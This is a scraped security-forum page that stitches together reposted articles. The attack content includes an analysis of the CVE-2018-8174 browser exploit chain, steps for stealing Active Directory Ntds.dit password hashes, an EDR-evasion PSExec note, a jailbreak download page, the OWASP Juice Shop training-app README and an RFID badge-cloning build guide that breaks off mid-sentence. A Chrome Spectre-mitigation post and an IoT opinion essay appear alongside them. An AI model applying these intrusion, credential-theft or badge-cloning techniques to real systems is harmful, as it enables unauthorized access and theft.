ref counter, release called: 4 Class ClassTerminateB at: 70541748 ref counter, release called: 3 Class ClassTerminateB at: 70541748 ref counter, release called: 2 ... Class ReuseClass created at 2260600 We can immediately see that ReuseClass is indeed allocated in the same memory that was assigned to 7 previous instances of ClassTerminate This is repeated twice. We end up with two objects referenced by UafArrays. None of those references is reflected in object's reference counter. In this log we can also notice that even after Class_Terminate was called there are some object manipulations that change its reference counter. That's why if we didn't balance this counter out in Class_Terminate we would get something like this: Class ClassTerminateA created at 2240708 Class ClassTerminateA at: 6c161748 ref counter, release called: 2 Class ClassTerminateA at: 6c161748 ref counter, release called: 2 Class ClassTerminateA at: 6c161748 ref counter, release called: 2 Class ClassTerminateA at: 6c161748 ref counter, release called: 1 Class ClassTerminateA at 2240708, terminate called Class ClassTerminateA at: 6c161748 ref counter, release called: 5 Class ClassTerminateA at: 6c161748 ref counter, release called: 4 Class ClassTerminateA at: 6c161748 ref counter, release called: 3 Class ReuseClass created at 2240740 Different allocation addresses. Exploit would fail to create use after free condition. Type Confusion Having created those two objects with 7 uncounted references to each, we established read arbitrary memory primitive. There are two similar classes ReuseClass and FakeReuseClass. By replacing first class with second one a type confusion on mem member occurs. In SetProp function ReuseClass.mem is saved and Default Property Get of class ReplacingClass_* is called, result of that call will be placed in ReuseClass.mem. Inside that getter UafArray is emptied by assigning 0 to each element. This causes VBScriptClass::Release to be called on ReuseClass object that is referenced by UafArray. It turns out that at this stage of execution ReuseClass object has reference counter equal to 7, and since we call Release 7 times, this object gets freed. And because those references came from use after free situation they are not accounted for in reference counter. In place of ReuseClass a new object of FakeReuseClass is allocated. Now to get its reference counter equal to 7, as was the case with ReuseClass we assign it 7 times to UafArray. Here is memory layout before and after this operation. After this is done the getter function will return a value that will be assigned to the old ReuseClass::mem variable. As can be seen on memory dumps, old value was placed 0xC bytes before the new one. Objects were specially crafted to cause this situation, for example by selecting proper length for function names. Now value written to ReuseClass::mem will overwrite FakeReuseClass::mem header, causing type confusion situation. Last line assigned string FakeArrayString to objectImitatingArray.mem. Header now has value of VT_BSTR Q=CDbl("174088534690791e-324") ' db 0, 0, 0, 0, 0Ch, 20h, 0, 0 This value overwrote objectImitatingArray.mem type to VT_ARRAY | VT_VARIANT and now pointer to string will be interpreted as pointer to SAFEARRAY structure. Arbitrary memory read The result is that we end up with two objects of FakeReuseClass. One of them has a mem member array that is addressing whole user-space (0x00000000 - 0x7fffffff) and the other has a member of type VT_I4 (4 byte integer) with pointer to an empty 16 byte string. Using the second object, a pointer to string is leaked: some_memory=resueObjectB_int.mem It will be later used as an address in memory that is writable. Next step is to leak any address inside vbscript.dll. Here a very neat trick is used. First we define that on error, script should just continue regular execution. Then there is an attempt to assign EmptySub to a variable. This is not possible in VBS but still a value is pushed on the stack before error is generated. Next instruction should assign null to a variable, which it does, by simply changing type of last value from the stack to VT_NULL. Now emptySub_addr_placeholder holds pointer to the function but with type set to VT_NULL. Then this value is written to our writable memory, its type is changed to VT_I4 and it is read back as integer. If we check the content of this value it turns out to be a pointer to CScriptEntryPoint and first member is vftable pointing inside vbscript.dll To read a value from arbitrary address, in this case pointer returned from LeakVBAddr, the following functions are used: Read is acheived by first writing address+4 to a writable memory, then type is changed to VT_BSTR. Now address+4 is treated as a pointer to BSTR. If we call LenB on address+4 it will return value pointed to by address. Why? Because of how BSTR is defined, unicode value is preceded by its length, and that length is returned by LenB. Now when address inside vbscript.dll was leaked, and having established arbitrary memory read it is a matter of properly traversing PE header to obtains all needed addresses. Details of doing that won’t be explained here. This article explains PE file in great details. Triggering code execution Final code execution is achived in two steps. First a chain of two calls is built, but it’s not a ROP chain. NtContinue is provided with CONTEXT structure that sets EIP to VirtualProtect address, and ESP to structure containing VirtualProtect's parameters. First address of shellcode is obtained using previously described technique of changing variable type to VT_I4 and reading the pointer. Next a structure for VirtualProtect is built, that contains all necessary parameters, like shellcode address, size and RWX protections. It also has space that will be used by stack operations inside VirtualProtect. After that a CONTEXT structure is built, with EIP set to VirtualProtect and ESP to its parameters. This structure also has as first value a pointer to NtContinue address repeated 4 times. Final step before starting this chain is to save the structure as string in memory. This function is then used to start the chain. First it changes type of the saved structure to 0x4D and then sets its value to 0, this causes VAR::Clear to be called. And a dynamic view from debugger Although it might seem complicated this chain of execution is very simple. Just two steps. Invoke NtContinue with CONTEXT structure pointing to VirtualProtect. Then VirtualProtect will disable DEP on memory page that contains the shellcode and after that it will return into the shellcode. Conclusion CVE-2018–8174 is a good example of chaining few use after free and type confusion conditions to achieve code execution in very clever way. It’s a great example to learn from and understand inner workings of such exploits. Useful links Commented exploit code Kaspersky’s root cause analysis 360’s analysis Another Kaspersky’s anlysis CVE-2014–6332 analysis by Trend Micro Sursa: https://medium.com/@florek/dissecting-modern-browser-exploit-case-study-of-cve-2018-8174-1a6046729890
-
- 1
-
-
Extracting Password Hashes from the Ntds.dit File March 27, 2017 Jeff Warren Comments 0 Comment AD Attack #3 – Ntds.dit Extraction With so much attention paid to detecting credential-based attacks such as Pass-the-Hash (PtH) and Pass-the-Ticket (PtT), other more serious and effective attacks are often overlooked. One such attack is focused on exfiltrating the Ntds.dit file from Active Directory Domain Controllers. Let’s take a look at what this threat entails and how it can be performed. Then we can review some mitigating controls to be sure you are protecting your own environment from such attacks. What is the Ntds.dit File? The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. By extracting these hashes, it is possible to use tools such as Mimikatz to perform pass-the-hash attacks, or tools like Hashcat to crack these passwords. The extraction and cracking of these passwords can be performed offline, so they will be undetectable. Once an attacker has extracted these hashes, they are able to act as any user on the domain, including Domain Administrators. Performing an Attack on the Ntds.dit File In order to retrieve password hashes from the Ntds.dit, the first step is getting a copy of the file. This isn’t as straightforward as it sounds, as this file is constantly in use by AD and locked. If you try to simply copy the file, you will see an error message similar to: There are several ways around this using capabilities built into Windows, or with PowerShell libraries. These approaches include: Use Volume Shadow Copies via the VSSAdmin command Leverage the NTDSUtil diagnostic tool available as part of Active Directory Use the PowerSploit penetration testing PowerShell modules Leverage snapshots if your Domain Controllers are running as virtual machines In this post, I’ll quickly walk you through two of these approaches: VSSAdmin and PowerSploit’s NinjaCopy. Using VSSAdmin to Steal the Ntds.dit File Step 1 – Create a Volume Shadow Copy Step 2 – Retrieve Ntds.dit file from Volume Shadow Copy Step 3 – Copy SYSTEM file from registry or Volume Shadow Copy. This contains the Boot Key that will be needed to decrypt the Ntds.dit file later. Step 4 – Delete your tracks Using PowerSploit NinjaCopy to Steal the Ntds.dit File PowerSploit is a PowerShell penetration testing framework that contains various capabilities that can be used for exploitation of Active Directory. One module is Invoke-NinjaCopy, which copies a file from an NTFS-partitioned volume by reading the raw volume. This approach is another way to access files that are locked by Active Directory without alerting any monitoring systems. Extracting Password Hashes Regardless of which approach was used to retrieve the Ntds.dit file, the next step is to extract password information from the database. As mentioned earlier, the value of this attack is that once you have the files necessary, the rest of the attack can be performed offline to avoid detection. DSInternals provides a PowerShell module that can be used for interacting with the Ntds.dit file, including extraction of password hashes. Once you have extracted the password hashes from the Ntds.dit file, you are able to leverage tools like Mimikatz to perform pass-the-hash (PtH) attacks. Furthermore, you can use tools like Hashcat to crack these passwords and obtain their clear text values. Once you have the credentials, there are no limitations to what you can do with them. How to Protect the Ntds.dit File The best way to stay protected against this attack is to limit the number of users who can log onto Domain Controllers, including commonly protected groups such as Domain and Enterprise Admins, but also Print Operators, Server Operators, and Account Operators. These groups should be limited, monitored for changes, and frequently recertified. In addition, leveraging monitoring software to alert on and prevent users from retrieving files off Volume Shadow Copies will be beneficial to reduce the attack surface. Here are the other blogs in the series: AD Attack #1 – Performing Domain Reconnaissance (PowerShell) Read Now AD Attack #2 – Local Admin Mapping (Bloodhound) Read Now AD Attack #4 – Stealing Passwords from Memory (Mimikatz) Read Now To watch the AD Attacks webinar, please click here. Jeff Warren Jeff Warren is STEALTHbits’ Vice President of Product Management. Jeff has held multiple roles within the Product Management group since joining the organization in 2010, initially building STEALTHbits’ SharePoint management offerings before shifting focus to the organization’s Data Access Governance solution portfolio as a whole. Before joining STEALTHbits, Jeff was a Software Engineer at Wall Street Network, a solutions provider specializing in GIS software and custom SharePoint development. With deep knowledge and experience in technology, product and project management, Jeff and his teams are responsible for designing and delivering STEALTHbits’ high quality, innovative solutions. Jeff holds a Bachelor of Science degree in Information Systems from the University of Delaware. Sursa: https://blog.stealthbits.com/extracting-password-hashes-from-the-ntds-dit-file/
-
- 2
-
-
Mitigating Spectre with Site Isolation in Chrome July 11, 2018 Posted by Charlie Reis, Site Isolator Speculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers. A website could use such attacks to steal data or login information from other websites that are open in the browser. To better mitigate these attacks, we're excited to announce that Chrome 67 has enabled a security feature called Site Isolation on Windows, Mac, Linux, and Chrome OS. Site Isolation has been optionally available as an experimental enterprise policy since Chrome 63, but many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users. This launch is one phase of our overall Site Isolation project. Stay tuned for additional security updates that will mitigate attacks beyond Spectre (e.g., attacks from fully compromised renderer processes). What is Spectre? In January, Google Project Zero disclosed a set of speculative execution side-channel attacks that became publicly known as Spectre and Meltdown. An additional variant of Spectre was disclosed in May. These attacks use the speculative execution features of most CPUs to access parts of memory that should be off-limits to a piece of code, and then use timing attacks to discover the values stored in that memory. Effectively, this means that untrustworthy code may be able to read any memory in its process's address space. This is particularly relevant for web browsers, since browsers run potentially malicious JavaScript code from multiple websites, often in the same process. In theory, a website could use such an attack to steal information from other websites, violating the Same Origin Policy. All major browsers have already deployed some mitigations for Spectre, including reducing timer granularity and changing their JavaScript compilers to make the attacks less likely to succeed. However, we believe the most effective mitigation is offered by approaches like Site Isolation, which try to avoid having data worth stealing in the same process, even if a Spectre attack occurs. What is Site Isolation? Site Isolation is a large change to Chrome's architecture that limits each renderer process to documents from a single site. As a result, Chrome can rely on the operating system to prevent attacks between processes, and thus, between sites. Note that Chrome uses a specific definition of "site" that includes just the scheme and registered domain. Thus, https://google.co.uk would be a site, and subdomains like https://maps.google.co.uk would stay in the same process. Chrome has always had a multi-process architecture where different tabs could use different renderer processes. A given tab could even switch processes when navigating to a new site in some cases. However, it was still possible for an attacker's page to share a process with a victim's page. For example, cross-site iframes and cross-site pop-ups typically stayed in the same process as the page that created them. This would allow a successful Spectre attack to read data (e.g., cookies, passwords, etc.) belonging to other frames or pop-ups in its process. When Site Isolation is enabled, each renderer process contains documents from at most one site. This means all navigations to cross-site documents cause a tab to switch processes. It also means all cross-site iframes are put into a different process than their parent frame, using "out-of-process iframes." Splitting a single page across multiple processes is a major change to how Chrome works, and the Chrome Security team has been pursuing this for several years, independently of Spectre. The first uses of out-of-process iframes shipped last year to improve the Chrome extension security model. A single page may now be split across multiple renderer processes using out-of-process iframes. Even when each renderer process is limited to documents from a single site, there is still a risk that an attacker's page could access and leak information from cross-site URLs by requesting them as subresources, such as images or scripts. Web browsers generally allow pages to embed images and scripts from any site. However, a page could try to request an HTML or JSON URL with sensitive data as if it were an image or script. This would normally fail to render and not expose the data to the page, but that data would still end up inside the renderer process where a Spectre attack might access it. To mitigate this, Site Isolation includes a feature called Cross-Origin Read Blocking (CORB), which is now part of the Fetch spec. CORB tries to transparently block cross-site HTML, XML, and JSON responses from the renderer process, with almost no impact to compatibility. To get the most protection from Site Isolation and CORB, web developers should check that their resources are served with the right MIME type and with the nosniff response header. Site Isolation is a significant change to Chrome's behavior under the hood, but it generally shouldn't cause visible changes for most users or web developers (beyond a few known issues). It simply offers more protection between websites behind the scenes. Site Isolation does cause Chrome to create more renderer processes, which comes with performance tradeoffs: on the plus side, each renderer process is smaller, shorter-lived, and has less contention internally, but there is about a 10-13% total memory overhead in real workloads due to the larger number of processes. Our team continues to work hard to optimize this behavior to keep Chrome both fast and secure. How does Site Isolation help? In Chrome 67, Site Isolation has been enabled for 99% of users on Windows, Mac, Linux, and Chrome OS. (Given the large scope of this change, we are keeping a 1% holdback for now to monitor and improve performance.) This means that even if a Spectre attack were to occur in a malicious web page, data from other websites would generally not be loaded into the same process, and so there would be much less data available to the attacker. This significantly reduces the threat posed by Spectre. Because of this, we are planning to re-enable precise timers and features like SharedArrayBuffer (which can be used as a precise timer) for desktop. What additional work is in progress? We're now investigating how to extend Site Isolation coverage to Chrome for Android, where there are additional known issues. Experimental enterprise policies for enabling Site Isolation will be available in Chrome 68 for Android, and it can be enabled manually on Android using chrome://flags/#enable-site-per-process. We're also working on additional security checks in the browser process, which will let Site Isolation mitigate not just Spectre attacks but also attacks from fully compromised renderer processes. These additional enforcements will let us reach the original motivating goals for Site Isolation, where Chrome can effectively treat the entire renderer process as untrusted. Stay tuned for an update about these enforcements! Finally, other major browser vendors are finding related ways to defend against Spectre by better isolating sites. We are collaborating with them and are happy to see the progress across the web ecosystem. Help improve Site Isolation! We offer cash rewards to researchers who submit security bugs through the Chrome Vulnerability Reward Program. For a limited time, security bugs affecting Site Isolation may be eligible for higher rewards levels, up to twice the usual amount for information disclosure bugs. Find out more about Chrome New Feature Special Rewards. Sursa: https://security.googleblog.com/2018/07/mitigating-spectre-with-site-isolation.html
-
Your IoT security concerns are stupid Lots of government people are focused on IoT security, such as this recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question. Government efforts focus on vulns and patching, ignoring more important issues. Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone/laptop computer which is all "in your face", IoT devices, once installed, are quickly forgotten. For another thing, the average lifespan of a device on your network is at least twice the duration of support from the vendor making patches available. Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don't get applied cause a small, but manageable constant hacking problem. Automatic patching causes rarer, but more catastrophic events when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet that was launched by subverting an automated patch of accounting software. Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have unique requirements of being exposed to the Internet and needing a remote factory reset, leading to the worm. While notPetya did exploit a Microsoft vuln, it's primary vector of spreading (after the subverted update) was via misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite supporting their vuln/patching policy, neither was really about vuln/patching. Such technical analysis of events like Mirai and notPetya are ignored. Policymakers are only cherrypicking the superficial conclusions supporting their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them. IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted. Those off-brand, poorly engineered security cameras you buy for $19 from Amazon.com shipped directly from Shenzen now look very different, having less Internet exposure, than the ones used in Mirai. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services. In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100-billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4-billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home. Lastly, focusing on the vendor is a tired government cliche. Chronic internet security problems that go unsolved year after year, decade after decade, come from users failing, not vendors. Vendors quickly adapt, users don't. The most important solutions to today's IoT insecurities are to firewall and microsegment networks, something wholly within control of users, even home users. Yet government policy makers won't consider the most important solutions, because their goal is less cybersecurity itself and more how cybersecurity can further their political interests. The best government policy for IoT policy is to do nothing, or at least focus on more relevant solutions than patching vulns. The ideas propose above will add costs to devices while making insignificant benefits to security. Yes, we will have IoT security issues in the future, but they will be new and interesting ones, requiring different solutions than the ones proposed. Sursa: https://blog.erratasec.com/2018/07/your-iot-security-concerns-are-stupid.html#.W0ju6LhRWUk
-
Customized PSExec via Reflective DLL July 13, 2018 ~ cplsec Hey all, I’m back in the pocket after doing the deep dive into hack the box. I really enjoyed the bulk of the challenges and learned some new great tricks and techniques. One box I highly recommend is Reel. It’s a great challenge with domain privilege escalation techniques that you might see in a pentest. Anyways, after reaching Guru status I decided to take a step back for a while, it’s a part-time job working all the newly released boxes. Before I went dark I was testing Cobalt Strike’s built-in PSExec module against various Endpoint Protection Platform (EPP) products and was getting flagged. It was pretty clear that the EPPs weren’t detecting the binary but was instead flagging via heuristic analysis. It might have been the randomized filename of the binary, the timing, writing to the $ADMIN share, or some sort of combination. I wrote some skeleton code that can be further customized to help bypass heuristic analysis. The current flow of the reflective DLL and Aggressor script can be seen below. You can find the code at https://github.com/ThunderGunExpress/Reflective_PSExec The code and script is pretty crude and has the following limitations at the moment: Use an IP address as the target, not a hostname If running against a remote target ensure the session is in a medium integrity context If running against a local target ensure the session is a high integrity context Sursa: https://ijustwannared.team/2018/07/13/customized-psexec-via-reflective-dll/
-
- 2
-
-
Compatible with iOS 11.2 – 11.3.1 For all iPhones, iPods touch, iPads and Apple TVs Download (Dev Account) Uses multipath tcp exploit. Codesigning entitlements: Here SHA1: 4c6e34a40621de2cd59cb3ebdf650307f7ccda93 Mirror: Mega Download (Non Dev Account) Uses vfs exploit. SHA1: 8fa140a5a63377a44ff8ea4aa054605d261f270d Mirror: Mega Download (tvOS) Thanks to nitoTV and Jaywalker for the tvOS port! SHA1: cff12acb81396778d4da3d0f574599d355862863 Mirror: Mega Important: Make sure to delete 11.4 OTA update, install tvOS profile (only install tvOS profile on iOS) and reboot before using Electra! Sursa: https://coolstar.org/electra/
-
OWASP Juice Shop The most trustworthy online shop out there. (@dschadow) — The best juice shop on the whole internet! (@shehackspurple) — Actually the most bug-free vulnerable application in existence! (@vanderaj) OWASP Juice Shop is an intentionally insecure web application written entirely in JavaScript which encompasses the entire range of OWASP Top Ten and other severe security flaws. For a detailed introduction, full list of features and architecture overview please visit the official project page: http://owasp-juice.shop Setup Deploy on Heroku (free ($0/month) dyno) Sign up to Heroku and log in to your account Click the button below and follow the instructions This is the quickest way to get a running instance of Juice Shop! If you have forked this repository, the deploy button will automatically pick up your fork for deployment! As long as you do not perform any DDoS attacks you are free to use any tools or scripts to hack your Juice Shop instance on Heroku! From Sources Install node.js Run git clone https://github.com/bkimminich/juice-shop.git (or clone your own fork of the repository) Go into the cloned folder with cd juice-shop Run npm install (only has to be done before first start or when you change the source code) Run npm start Browse to http://localhost:3000 Packaged Distributions Install a 64bit node.js on your Windows (or Linux) machine Download juice-shop-<version>_<node-version>_<os>_x64.zip (or .tgz) attached to latest release Unpack and cd into the unpacked folder Run npm start Browse to http://localhost:3000 Each packaged distribution includes some binaries for SQLite bound to the OS and node.js version which npm install was executed on. Docker Container Install Docker Run docker pull bkimminich/juice-shop Run docker run --rm -p 3000:3000 bkimminich/juice-shop Browse to http://localhost:3000 (on macOS and Windows browse to http://192.168.99.100:3000 if you are using docker-machine instead of the native docker installation) If you want to run Juice Shop on a Raspberry Pi 3, there is an unofficial Docker image available at https://hub.docker.com/r/arclight/juice-shop_arm which is based on resin/rpi-raspbian and maintained by @battletux. Even easier: Run Docker Container from Docker Toolbox (Kitematic) Install and launch Docker Toolbox Search for juice-shop and click Create to download image and run container Click on the Open icon next to Web Preview to browse to OWASP Juice Shop Deploy to Docker Cloud (🔬) Click the button below and follow the instructions This (🔬) is an experimental deployment option! Your feedback is appreciated at https://gitter.im/bkimminich/juice-shop. Vagrant Install Vagrant and Virtualbox Run git clone https://github.com/bkimminich/juice-shop.git (or clone your own fork of the repository) Run cd vagrant && vagrant up Browse to 192.168.33.10 Amazon EC2 Instance Setup an Amazon Linux AMI instance In Step 3: Configure Instance Details unfold Advanced Details and copy the script below into User Data In Step 6: Configure Security Group add a Rule that opens port 80 for HTTP Launch instance Browse to your instance's public DNS #!/bin/bash yum update -y yum install -y docker service docker start docker pull bkimminich/juice-shop docker run -d -p 80:3000 bkimminich/juice-shop Technically Amazon could view hacking activity on any EC2 instance as an attack on their AWS infrastructure! We highly discourage aggressive scanning or automated brute force attacks! You have been warned! Azure Web App for Containers Open your Azure CLI or login to the Azure Portal, open the CloudShell and then choose Bash (not PowerShell). Create a resource group by running az group create --name <group name> --location <location name, e.g. "East US"> Create an app service plan by running az appservice plan create --name <plan name> --resource-group <group name> --sku S1 --is-linux Create a web app with the Juice Shop Docker image by running the following (on one line in the bash shell) az webapp create --resource-group <group name> --plan <plan name> --name <app name> --deployment-container-image-name bkimminich/juice-shop For more information please refer to the detailed walkthrough with screenshots by @JasonHaley. You can alternatively follow his guide to set up OWASP Juice Shop as an Azure Container Instance. Node.js version compatibility OWASP Juice Shop officially supports the following versions of node.js in line as close as possible with the official node.js LTS schedule. Docker images and packaged distributions are offered accordingly: node.js Docker image Packaged distributions 9.x latest (current official release), snapshot (preview from develop branch) juice-shop-<version>_node9_windows_x64.zip, juice-shop-<version>_node9_linux_x64.tgz 8.x juice-shop-<version>_node8_windows_x64.zip, juice-shop-<version>_node8_linux_x64.tgz Demo Feel free to have a look at the latest version of OWASP Juice Shop: http://demo.owasp-juice.shop This is a deployment-test and sneak-peek instance only! You are not supposed to use this instance for your own hacking endeavours! No guaranteed uptime! Guaranteed stern looks if you break it! Customization Via a YAML configuration file in /config, the OWASP Juice Shop can be customized in its content and look & feel. For detailed instructions and examples please refer to our Customization documentation. CTF-Extension If you want to run OWASP Juice Shop as a Capture-The-Flag event, we recommend you set it up along with a CTFd server conveniently using the official juice-shop-ctf-cli tool. For step-by-step instructions and examples please refer to the Hosting a CTF event chapter of our companion guide ebook. XSS Demo To show the possible impact of XSS, you can download this docker-compose-file and run docker-compose up to start the juice-shop and the shake-logger. Assume you received and (of course) clicked this inconspicuous phishing link and login. Apart from the visual/audible effect, the attacker also installed an input logger to grab credentials! This could easily run on a 3rd party server in real life! You can also find a recording of this attack in action on YouTube: 📺 Additional Documentation Pwning OWASP Juice Shop This is the official companion guide to the OWASP Juice Shop. It will give you a complete overview of the vulnerabilities found in the application including hints how to spot and exploit them. In the appendix you will even find complete step-by-step solutions to every challenge. Pwning OWASP Juice Shop is published with GitBook under CC BY-NC-ND 4.0 and is available for free in PDF, Kindle and ePub format. You can also browse the full content online! Slide Decks Introduction Slide Deck in HTML5 PDF of the Intro Slide Deck on Slideshare Troubleshooting If you need help with the application setup please check the TROUBLESHOOTING.md or post your specific problem or question in the official Gitter Chat. Contributing We are always happy to get new contributors on board! Please check the following table for possible ways to do so: ❓ 💡 Found a bug? Crashed the app? Broken challenge? Found a vulnerability that is not on the Score Board? Create an issue or post your ideas in the chat Want to help with development? Pull requests are highly welcome! Please refer to the Contribute to development and Codebase 101 chapters of our companion guide ebook Want to help with internationalization? Find out how to join our Crowdin project in the Helping with translations documentation Anything else you would like to contribute? Write an email to owasp_juice_shop_project@lists.owasp.org or bjoern.kimminich@owasp.org References Did you write a blog post, magazine article or do a podcast about or mentioning OWASP Juice Shop? Or maybe you held or joined a conference talk or meetup session, a hacking workshop or public training where this project was mentioned? Add it to our ever-growing list of REFERENCES.md by forking and opening a Pull Request! Merchandise On Spreadshirt.com and Spreadshirt.de you can get some swag (Shirts, Hoodies, Mugs) with the official OWASP Juice Shop logo On StickerYou.com you can get variants of the OWASP Juice Shop logo as single stickers to decorate your laptop with. They can also print magnets, iron-ons, sticker sheets and temporary tattoos. The most honorable way to get some stickers is to contribute to the project by fixing an issue, finding a serious bug or submitting a good idea for a new challenge! We're also happy to supply you with stickers if you organize a meetup or conference talk where you use or talk about or hack the OWASP Juice Shop! Just contact the mailing list or the project leader to discuss your plans! ! Donations PayPal PayPal donations via above button go to the OWASP Foundations and are earmarked for "Juice Shop". This is the preferred and most convenient way to support the project. Credit Card (through RegOnline) OWASP hosts a donation form on RegOnline. Refer to the Credit card donation step-by-step guide for help with filling out the donation form correctly. Crypto Currency Contributors The OWASP Juice Shop core project team are: Björn Kimminich aka bkimminich (Project Leader) Jannik Hollenbach aka J12934 Timo Pagel aka wurstbrot For a list of all contributors to the OWASP Juice Shop please visit our HALL_OF_FAME.md. Licensing This program is free software: you can redistribute it and/or modify it under the terms of the MIT license. OWASP Juice Shop and any contributions are Copyright © by Bjoern Kimminich 2014-2018. Sursa: https://github.com/bkimminich/juice-shop
-
- 1
-
-
RFID Thief v2.0 12 Jul 2018 » all, rfid, tutorial Table of Contents Overview Proxmark 3 Long Range Readers Wiegotcha Raspberry Pi Setup Wiring Raspberry Pi HID iClass R90 HID Indala ASR620 HID MaxiProx 5375 Controller (Optional) Tutorial iClass R90 Indala ASR620 MaxiProx 5375 Components References Overview This post will outline how to build and use long range RFID readers to clone iClass, Indala & Prox cards used for Access Control. Proxmark 3 If you are unfamiliar with the Proxmark 3, it is a general purpose RFID Cloning tool, equipped with a high and low frequency antenna to snoop, listen, clone and emulate RFID cards. There are currently 4 versions of the Proxmark 3, all use the same firmware and software however some have more/less hardware features. Version Picture RDV1 RDV2 RDV3 RDV4 Long Range Readers There are 3 main types of long range readers HID sell, the R90, ASR-620 and MaxiProx 5375. Each reader supports a different type of card: Reader Card Type Picture HID iClass R90 iClass Legacy (13.56 MHz) HID Indala ASR-620 Indala 26bit (125 kHz) HID MaxiProx 5375 ProxCard II (125 kHz) Wiegotcha Wiegotcha is the awesome software for the Raspberry Pi developed by Mike Kelly that improves upon the Tastic RFID Thief in the following areas: Acts as a wireless AP with a simple web page to display captured credentials. Automatically calculates the iClass Block 7 data for cloning. Uses a hardware clock for accurate timestamps. AIO solution, eliminates the need for custom PCB’s and multiple breakout boards. Utilizes an external rechargeable battery. Raspberry Pi Setup This build will make use of the Raspberry Pi 3 to receive the raw Wiegand data from the long range readers and provide an access point to view/save the collected data. MicroSD Card Setup 1. Download and extract Raspbian Stretch. 2. Download ethcher or any disk writer you prefer. 3. Write the Raspbian Strech .img file to the MicroSD card using a USB adapter. 4. Unplug and replug the USB adapter to see ‘boot’ drive. 5. Edit cmdline.txt and add modules-load=dwc2,g_ether after the word rootwait so that so that it looks like this: dwc_otg.lpm_enable=0 console=serial0,115200 console=tty1 root=PARTUUID=9cba179a-02 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait modules-load=dwc2,g_ether quiet init=/usr/lib/raspi-config/init_resize.sh splash plymouth.ignore-serial-consoles 6. Edit config.txt and append dtoverlay=dwc2 to the end of the file. 7. Create a blank file within the ‘boot’ directory called ssh. Raspberry Pi Configuration 1. Connect the RPi to your local network and ssh to it using the default password raspberry. 2. Run sudo su to become the root user. 3. Clone the Wiegotcha repository to the /root directory. cd /root git clone https://github.com/lixmk/Wiegotcha 4. Run the install script in the Wiegotcha directory. cd Wiegotcha ./install.sh 5. Follow the prompts as requested, the RPi will reboot once completed. Be patient, this process can take some time. 6. After reboot, reconnect to the RPi using ssh and enter the following: sudo su screen -dr install 7. RPi will reboot and the installation is completed. The RPi will now broadcast with the ESSID: Wiegotcha, you can connect to it using the passphrase Wiegotcha. Wiegotcha assigns the static IP 192.168.150.1 to the RPi. Wiring Each reader will require a Bi-Directional Logic Level Converter, this is used to convert the 5v Wiegand output from the readers to the 3.3v RPi GPIOs. For quality of life, I have added JST SM connectors allowing quick interchangeability between the different long range readers. You may choose to add another external controller with switches to power the readers on/off, enable/disable sound or vibration, however this is optional. The following is a general overview of how the components are connected together: RPi GPIO Pins 1,3,5,7,9 -> Hardware RTC RPi to Logic Level Converter GPIO Pin 4 -> LLC HV GPIO Pin 6 -> LLC LV GND GPIO Pin 11 -> LLC LV 1 GPIO Pin 12 -> LLC LV 4 GPIO Pin 17 -> LLC LV Long Range Reader to Logic Level Converter LRR DATA 0 (Green) -> LLC HV 1 LRR DATA 1 (White) -> LLC HV 4 LRR SHIELD -> LLC HV GND Raspberry Pi 1. Connect the Hardware RTC to GPIO pins 1,3,5,7,9. 2. Solder female jumper wires to a male JST SM connector according to the table below and connect to the RPi. RPi JST SM Connector GPIO Pin 4 Blue GPIO Pin 6 Black GPIO Pin 11 Green GPIO Pin 12 White GPIO Pin 17 Red HID iClass R90 1. Join wires from the HID R90 to the logic level converter according to the table below. HID R90 Logic Level Converter P1-6 (DATA 0) HV 1 P1-7 (DATA 1) HV 4 P2-2 (GROUND/SHIELD) HV GND 2. Solder female jumper wires from the logic level converter to a female JST SM connector according to the table below. Logic Level Converter JST SM Connector LV Red LV GND Black LV 1 Green LV 4 White HV Blue 3. Join Positive and Negative cables from the HID R90 to a DC connector/adapter. HID R90 DC Connector/Adapter P2-1 Positive (+) P1-5 Negative (-) HID Indala ASR620 The Indala ASR620 will have a wiring harness from factory that you can utilize, the shield wire is within the harness itself so you need to slice a portion of the harness to expose. 1. Splice and solder wires from the Indala ASR620 to the logic level converter according to the table below. Indala ASR620 Logic Level Converter Green (DATA 0) HV 1 White (DATA 1) HV 4 Shield HV GND 2. Solder female jumper wires from the logic level converter to a female JST SM connector according to the table below. Logic Level Converter JST SM Connector LV Red LV GND Black LV 1 Green LV 4 White HV Blue 3. Join Positive and Negative cables from the Indala ASR620 to a DC connector/adapter. Indala ASR620 DC Connector/Adapter Red Positive (+) Black Negative (-) HID MaxiProx 5375 1. Join wires from MaxiProx 5375 to the logic level converter according to the table below. MaxiProx 5375 Logic Level Converter TB2-1(DATA 0) HV 1 TB2-2 (DATA 1) HV 4 TB1-2 (SHIELD) HV GND 2. Solder female jumper wires from the logic level converter to a female JST SM connector according to the table below. Logic Level Converter JST SM Connector LV Red LV GND Black LV 1 Green LV 4 White HV Blue 3. Join Positive and Negative cables from the MaxiProx 5375 to a DC connector/adapter. MaxiProx 5375 DC Connector/Adapter TB1-1 Positive (+) TB1-3 Negative (-) Controller Hearing a loud beep from your backpack when you intercept a card is probably not good, to avoid this, I made a makeshift controller, to easily power on/off and switch between sound or vibration or both. Each long range reader contains a sound buzzer either soldered or wired to the board, you can de-solder and replace this with extended wires to the controller. Within the makeshift controller you can splice/solder a sound buzzer 